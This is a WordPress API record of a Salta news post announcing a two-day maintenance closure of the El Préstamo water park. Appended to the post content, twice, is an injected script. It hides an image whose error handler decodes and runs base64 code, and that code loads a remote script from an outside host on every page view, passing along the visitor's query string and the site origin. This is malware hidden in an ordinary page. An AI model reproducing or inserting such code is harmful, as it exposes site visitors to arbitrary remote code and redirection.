{"id":3679,"date":"2024-02-13T12:15:43","date_gmt":"2024-02-13T15:15:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3679"},"modified":"2025-08-14T00:00:44","modified_gmt":"2025-08-14T03:00:44","slug":"el-miercoles-y-jueves-el-parque-acuatico-de-el-prestamo-permanecera-cerrado","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3679","title":{"rendered":"El mi\u00e9rcoles y jueves el Parque Acu\u00e1tico de El Pr\u00e9stamo permanecer\u00e1 cerrado"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-51ace0e392322ec6716743f48826977a\"><em>Con el objetivo de realizar tareas de mantenimiento el parque acu\u00e1tico permanecer\u00e1 cerrado el mi\u00e9rcoles 14 y jueves 15. Reabrir\u00e1 sus puertas el viernes 16.<\/em><\/h3>\n\n\n\n<p>La&nbsp;<strong>Unidad Coordinadora de Parques Urbanos&nbsp;<\/strong>del Ministerio de Turismo y Deportes de Salta informa que el parque acu\u00e1tico del Camping y Parque Acu\u00e1tico El Pr\u00e9stamo permanecer\u00e1 cerrado el mi\u00e9rcoles 14 y jueves 15 de este mes, con el objetivo de realizar trabajos de mantenimiento.<\/p>\n\n\n\n<p>El viernes 16 el parque acu\u00e1tico reabrir\u00e1 sus puertas en el horario de 11 a 19 hs. Se recuerda que para ni\u00f1os de hasta 10 a\u00f1os, jubilados y pensionados, la entrada al camping y al parque es gratuita.<\/p>\n\n\n\n<p>Asimismo, informa que el camping del complejo continuar\u00e1 abierto de manera normal.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-miercoles-y-jueves-el-parque-acuatico-de-el-prestamo-permanecera-cerrado-94181\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con el objetivo de realizar tareas de mantenimiento el parque acu\u00e1tico permanecer\u00e1 cerrado el mi\u00e9rcoles 14 y jueves 15. Reabrir\u00e1 sus puertas el viernes 16. La&nbsp;Unidad Coordinadora de Parques Urbanos&nbsp;del Ministerio de Turismo y Deportes de Salta informa que el parque acu\u00e1tico del Camping y Parque Acu\u00e1tico El Pr\u00e9stamo permanecer\u00e1 cerrado el mi\u00e9rcoles 14 y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3680,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3679","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3679"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3679"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3679\/revisions"}],"predecessor-version":[{"id":6854,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3679\/revisions\/6854"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3680"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}